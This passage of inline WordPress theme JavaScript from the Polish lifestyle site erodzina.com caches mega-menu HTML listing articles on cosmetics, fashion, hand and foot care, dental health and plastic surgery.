title=\"By\u0107 zadowolon\u0105 z w\u0142asnego wygl\u0105du\">By\u0107 zadowolon\u0105 z w\u0142asnego wygl\u0105du<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2018-10-05T16:35:05+00:00\" >5 pa\u017adziernika 2018<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/kwasy-zabieg-ktory-warto-zrobic-jesienia\/\" rel=\"bookmark\" title=\"Kwasy \u2013 zabieg, kt\u00f3ry warto zrobi\u0107 jesieni\u0105\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/08\/4_kwasy_zabieg_ktory_warto_zrobic_jesienia-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/08\/4_kwasy_zabieg_ktory_warto_zrobic_jesienia-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/08\/4_kwasy_zabieg_ktory_warto_zrobic_jesienia-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/08\/4_kwasy_zabieg_ktory_warto_zrobic_jesienia-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Kwasy \u2013 zabieg, kt\u00f3ry warto zrobi\u0107 jesieni\u0105\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/uroda-i-styl\/chirurgia-plastyczna\/\" class=\"td-post-category\">Chirurgia plastyczna<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/kwasy-zabieg-ktory-warto-zrobic-jesienia\/\" rel=\"bookmark\" title=\"Kwasy \u2013 zabieg, kt\u00f3ry warto zrobi\u0107 jesieni\u0105\">Kwasy \u2013 zabieg, kt\u00f3ry warto zrobi\u0107 jesieni\u0105<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2018-08-13T19:20:55+00:00\" >13 sierpnia 2018<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/korekta-nosa\/\" rel=\"bookmark\" title=\"Korekta nosa\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/08\/eye-122707_1920-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/08\/eye-122707_1920-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/08\/eye-122707_1920-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/08\/eye-122707_1920-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Korekta nosa\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/uroda-i-styl\/chirurgia-plastyczna\/\" class=\"td-post-category\">Chirurgia plastyczna<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/korekta-nosa\/\" rel=\"bookmark\" title=\"Korekta nosa\">Korekta nosa<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2018-08-07T10:11:11+00:00\" >7 sierpnia 2018<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><\/div>","td_block_id":"td_uid_62_5c5e20b7aa09a","td_hide_prev":true,"td_hide_next":false}));
                                                    tmpObj = JSON.parse(JSON.stringify(block_td_uid_62_5c5e20b7aa09a));
                            tmpObj.is_ajax_running = true;
                            tmpObj.td_current_page = 1;
                            tmpObj.td_filter_value = 48;
                            var currentBlockObjSignature = JSON.stringify(tmpObj);
                            tdLocalCache.set(currentBlockObjSignature, JSON.stringify({"td_data":"<div class=\"td-mega-row\"><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/bolesny-problem-wrastajacych-paznokci\/\" rel=\"bookmark\" title=\"Bolesny problem wrastaj\u0105cych paznokci\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/09\/feet-1659412_1920-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/09\/feet-1659412_1920-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/09\/feet-1659412_1920-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/09\/feet-1659412_1920-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Bolesny problem wrastaj\u0105cych paznokci\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/uroda-i-styl\/dlonie-i-stopy\/\" class=\"td-post-category\">D\u0142onie i stopy<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/bolesny-problem-wrastajacych-paznokci\/\" rel=\"bookmark\" title=\"Bolesny problem wrastaj\u0105cych paznokci\">Bolesny problem wrastaj\u0105cych paznokci<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2018-09-25T16:49:33+00:00\" >25 wrze\u015bnia 2018<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/zadbaj-o-wykonaj-perfekcyjny-manicure\/\" rel=\"bookmark\" title=\"Zadbaj o siebie &#8211; wykonaj perfekcyjny manicure\"><img width=\"260\" height=\"173\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/02\/manicure-1365552_1920.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/02\/manicure-1365552_1920.jpg 1000w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/02\/manicure-1365552_1920-300x200.jpg 300w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/02\/manicure-1365552_1920-768x511.jpg 768w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/02\/manicure-1365552_1920-127x85.jpg 127w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/02\/manicure-1365552_1920-101x68.jpg 101w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Zadbaj o siebie &#8211; wykonaj perfekcyjny manicure\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/uroda-i-styl\/dlonie-i-stopy\/\" class=\"td-post-category\">D\u0142onie i stopy<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/zadbaj-o-wykonaj-perfekcyjny-manicure\/\" rel=\"bookmark\" title=\"Zadbaj o siebie &#8211; wykonaj perfekcyjny manicure\">Zadbaj o siebie &#8211; wykonaj perfekcyjny manicure<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2018-02-19T16:00:43+00:00\" >19 lutego 2018<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/piekne-dlonie-zrobic-by-je-posiadac\/\" rel=\"bookmark\" title=\"Pi\u0119kne d\u0142onie \u2013 co zrobi\u0107, by je posiada\u0107?\"><img width=\"260\" height=\"173\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/02\/hand-302802_1920.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/02\/hand-302802_1920.jpg 1000w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/02\/hand-302802_1920-300x200.jpg 300w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/02\/hand-302802_1920-768x511.jpg 768w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/02\/hand-302802_1920-127x85.jpg 127w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/02\/hand-302802_1920-101x68.jpg 101w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Pi\u0119kne d\u0142onie \u2013 co zrobi\u0107, by je posiada\u0107?\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/uroda-i-styl\/dlonie-i-stopy\/\" class=\"td-post-category\">D\u0142onie i stopy<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/piekne-dlonie-zrobic-by-je-posiadac\/\" rel=\"bookmark\" title=\"Pi\u0119kne d\u0142onie \u2013 co zrobi\u0107, by je posiada\u0107?\">Pi\u0119kne d\u0142onie \u2013 co zrobi\u0107, by je posiada\u0107?<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2018-02-01T14:17:45+00:00\" >1 lutego 2018<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><\/div>","td_block_id":"td_uid_62_5c5e20b7aa09a","td_hide_prev":true,"td_hide_next":false}));
                                                    tmpObj = JSON.parse(JSON.stringify(block_td_uid_62_5c5e20b7aa09a));
                            tmpObj.is_ajax_running = true;
                            tmpObj.td_current_page = 1;
                            tmpObj.td_filter_value = 50;
                            var currentBlockObjSignature = JSON.stringify(tmpObj);
                            tdLocalCache.set(currentBlockObjSignature, JSON.stringify({"td_data":"<div class=\"td-mega-row\"><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/5-sposobow-na-hipnotyzujace-rzesy\/\" rel=\"bookmark\" title=\"5 sposob\u00f3w na hipnotyzuj\u0105ce rz\u0119sy\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/01\/hipnotyzujace-rzesy-isadora-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/01\/hipnotyzujace-rzesy-isadora-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/01\/hipnotyzujace-rzesy-isadora-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/01\/hipnotyzujace-rzesy-isadora-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"5 sposob\u00f3w na hipnotyzuj\u0105ce rz\u0119sy\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/uroda-i-styl\/kosmetyki\/\" class=\"td-post-category\">Kosmetyki<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/5-sposobow-na-hipnotyzujace-rzesy\/\" rel=\"bookmark\" title=\"5 sposob\u00f3w na hipnotyzuj\u0105ce rz\u0119sy\">5 sposob\u00f3w na hipnotyzuj\u0105ce rz\u0119sy<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2019-01-29T17:12:41+00:00\" >29 stycznia 2019<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/idealny-podklad-poznaj-affinitone-od-maybelline\/\" rel=\"bookmark\" title=\"Idealny podk\u0142ad? Poznaj Affinitone od Maybelline!\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/12\/fotolia_168227706_subscription_monthly_m-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/12\/fotolia_168227706_subscription_monthly_m-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/12\/fotolia_168227706_subscription_monthly_m-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/12\/fotolia_168227706_subscription_monthly_m-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Idealny podk\u0142ad? Poznaj Affinitone od Maybelline!\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/uroda-i-styl\/kosmetyki\/\" class=\"td-post-category\">Kosmetyki<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/idealny-podklad-poznaj-affinitone-od-maybelline\/\" rel=\"bookmark\" title=\"Idealny podk\u0142ad? Poznaj Affinitone od Maybelline!\">Idealny podk\u0142ad? Poznaj Affinitone od Maybelline!<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2018-12-02T11:39:17+00:00\" >2 grudnia 2018<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/kosmetyki-do-ciala-w-minimalistycznym-wydaniu\/\" rel=\"bookmark\" title=\"Kosmetyki do cia\u0142a w minimalistycznym wydaniu\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/09\/f3d035889c5e75a0c9e6a00277284924-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/09\/f3d035889c5e75a0c9e6a00277284924-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/09\/f3d035889c5e75a0c9e6a00277284924-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/09\/f3d035889c5e75a0c9e6a00277284924-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Kosmetyki do cia\u0142a w minimalistycznym wydaniu\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/uroda-i-styl\/kosmetyki\/\" class=\"td-post-category\">Kosmetyki<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/kosmetyki-do-ciala-w-minimalistycznym-wydaniu\/\" rel=\"bookmark\" title=\"Kosmetyki do cia\u0142a w minimalistycznym wydaniu\">Kosmetyki do cia\u0142a w minimalistycznym wydaniu<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2018-09-19T13:31:52+00:00\" >19 wrze\u015bnia 2018<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><\/div>","td_block_id":"td_uid_62_5c5e20b7aa09a","td_hide_prev":true,"td_hide_next":false}));
                                                    tmpObj = JSON.parse(JSON.stringify(block_td_uid_62_5c5e20b7aa09a));
                            tmpObj.is_ajax_running = true;
                            tmpObj.td_current_page = 1;
                            tmpObj.td_filter_value = 46;
                            var currentBlockObjSignature = JSON.stringify(tmpObj);
                            tdLocalCache.set(currentBlockObjSignature, JSON.stringify({"td_data":"<div class=\"td-mega-row\"><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/ktora-bizuteria-okaze-sie-najlepszym-wyborem\/\" rel=\"bookmark\" title=\"Kt\u00f3ra bi\u017cuteria oka\u017ce si\u0119 najlepszym wyborem?\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/01\/hand-3938729_960_720-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/01\/hand-3938729_960_720-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/01\/hand-3938729_960_720-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/01\/hand-3938729_960_720-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Kt\u00f3ra bi\u017cuteria oka\u017ce si\u0119 najlepszym wyborem?\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/uroda-i-styl\/moda-i-uroda\/\" class=\"td-post-category\">Moda i uroda<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/ktora-bizuteria-okaze-sie-najlepszym-wyborem\/\" rel=\"bookmark\" title=\"Kt\u00f3ra bi\u017cuteria oka\u017ce si\u0119 najlepszym wyborem?\">Kt\u00f3ra bi\u017cuteria oka\u017ce si\u0119 najlepszym wyborem?<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2019-01-31T14:04:55+00:00\" >31 stycznia 2019<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/odziez-chlopieca-jak-wybrac-uniwersalne-ubranie-na-lata\/\" rel=\"bookmark\" title=\"Odzie\u017c ch\u0142opi\u0119ca \u2013 jak wybra\u0107 uniwersalne ubranie na lata\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/09\/chlopiec2-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/09\/chlopiec2-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/09\/chlopiec2-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/09\/chlopiec2-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Odzie\u017c ch\u0142opi\u0119ca \u2013 jak wybra\u0107 uniwersalne ubranie na lata\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/uroda-i-styl\/moda-i-uroda\/\" class=\"td-post-category\">Moda i uroda<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/odziez-chlopieca-jak-wybrac-uniwersalne-ubranie-na-lata\/\" rel=\"bookmark\" title=\"Odzie\u017c ch\u0142opi\u0119ca \u2013 jak wybra\u0107 uniwersalne ubranie na lata\">Odzie\u017c ch\u0142opi\u0119ca \u2013 jak wybra\u0107 uniwersalne ubranie na lata<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2018-09-21T19:33:17+00:00\" >21 wrze\u015bnia 2018<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/buty-meskie-na-wiosne-co-warto-miec-w-swojej-szafie\/\" rel=\"bookmark\" title=\"Buty m\u0119skie na wiosn\u0119 &#8211; co warto mie\u0107 w swojej szafie?\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/04\/adobestock_151167351-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/04\/adobestock_151167351-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/04\/adobestock_151167351-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/04\/adobestock_151167351-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Buty m\u0119skie na wiosn\u0119 &#8211; co warto mie\u0107 w swojej szafie?\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/uroda-i-styl\/moda-i-uroda\/\" class=\"td-post-category\">Moda i uroda<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/buty-meskie-na-wiosne-co-warto-miec-w-swojej-szafie\/\" rel=\"bookmark\" title=\"Buty m\u0119skie na wiosn\u0119 &#8211; co warto mie\u0107 w swojej szafie?\">Buty m\u0119skie na wiosn\u0119 &#8211; co warto mie\u0107 w swojej szafie?<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2018-04-30T12:01:10+00:00\" >30 kwietnia 2018<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><\/div>","td_block_id":"td_uid_62_5c5e20b7aa09a","td_hide_prev":true,"td_hide_next":false}));
                                                    tmpObj = JSON.parse(JSON.stringify(block_td_uid_62_5c5e20b7aa09a));
                            tmpObj.is_ajax_running = true;
                            tmpObj.td_current_page = 1;
                            tmpObj.td_filter_value = 49;
                            var currentBlockObjSignature = JSON.stringify(tmpObj);
                            tdLocalCache.set(currentBlockObjSignature, JSON.stringify({"td_data":"<div class=\"td-mega-row\"><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/piekny-usmiech-twoim-kluczem-sukcesu\/\" rel=\"bookmark\" title=\"Pi\u0119kny u\u015bmiech &#8211; Twoim kluczem do sukcesu\"><img width=\"260\" height=\"173\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2017\/07\/dentist-1025338_1280.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2017\/07\/dentist-1025338_1280.jpg 1000w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2017\/07\/dentist-1025338_1280-300x199.jpg 300w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2017\/07\/dentist-1025338_1280-768x510.jpg 768w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2017\/07\/dentist-1025338_1280-127x85.jpg 127w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2017\/07\/dentist-1025338_1280-101x68.jpg 101w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Pi\u0119kny u\u015bmiech &#8211; Twoim kluczem do sukcesu\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/uroda-i-styl\/piekny-usmiech\/\" class=\"td-post-category\">Pi\u0119kny u\u015bmiech<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/piekny-usmiech-twoim-kluczem-sukcesu\/\" rel=\"bookmark\" title=\"Pi\u0119kny u\u015bmiech &#8211; Twoim kluczem do sukcesu\">Pi\u0119kny u\u015bmiech &#8211; Twoim kluczem do sukcesu<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2017-07-26T15:55:39+00:00\" >26 lipca 2017<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/pol-wieku-implantami-stomatologicznymi\/\" rel=\"bookmark\" title=\"P\u00f3\u0142 wieku z implantami stomatologicznymi\"><img width=\"260\" height=\"172\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2016\/06\/9.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2016\/06\/9.jpg 900w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2016\/06\/9-300x199.jpg 300w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2016\/06\/9-768x509.jpg 768w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2016\/06\/9-127x85.jpg 127w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2016\/06\/9-101x68.jpg 101w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"P\u00f3\u0142 wieku z implantami stomatologicznymi\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/uroda-i-styl\/piekny-usmiech\/\" class=\"td-post-category\">Pi\u0119kny u\u015bmiech<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/pol-wieku-implantami-stomatologicznymi\/\" rel=\"bookmark\" title=\"P\u00f3\u0142 wieku z implantami stomatologicznymi\">P\u00f3\u0142 wieku z implantami stomatologicznymi<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2016-06-26T18:07:45+00:00\" >26 czerwca 2016<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/salatka-tunczyk-z-makaronem\/\" rel=\"bookmark\" title=\"Sa\u0142atka tu\u0144czyk z makaronem\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/themes\/ionMag\/images\/no-thumb\/td_260x195.png\" alt=\"\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/uroda-i-styl\/piekny-usmiech\/\" class=\"td-post-category\">Pi\u0119kny u\u015bmiech<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/salatka-tunczyk-z-makaronem\/\" rel=\"bookmark\" title=\"Sa\u0142atka tu\u0144czyk z makaronem\">Sa\u0142atka tu\u0144czyk z makaronem<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2006-04-14T19:39:55+00:00\" >14 kwietnia 2006<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><\/div>","td_block_id":"td_uid_62_5c5e20b7aa09a","td_hide_prev":true,"td_hide_next":false}));
                                                    tmpObj = JSON.parse(JSON.stringify(block_td_uid_62_5c5e20b7aa09a));
                            tmpObj.is_ajax_running = true;
                            tmpObj.td_current_page = 1;
                            tmpObj.td_filter_value = 47;
                            var currentBlockObjSignature = JSON.stringify(tmpObj);
                            tdLocalCache.set(currentBlockObjSignature, JSON.stringify({"td_data":"<div class=\"td-mega-row\"><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/urzekajacy-makijaz-wieczorowy-jak-go-zrobic\/\" rel=\"bookmark\" title=\"Urzekaj\u0105cy makija\u017c wieczorowy \u2013 jak go zrobi\u0107?\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/12\/fotolia_224482616_subscription_monthly_m-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/12\/fotolia_224482616_subscription_monthly_m-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/12\/fotolia_224482616_subscription_monthly_m-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/12\/fotolia_224482616_subscription_monthly_m-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Urzekaj\u0105cy makija\u017c wieczorowy \u2013 jak go zrobi\u0107?\"\/><\/a><\/div>                <div 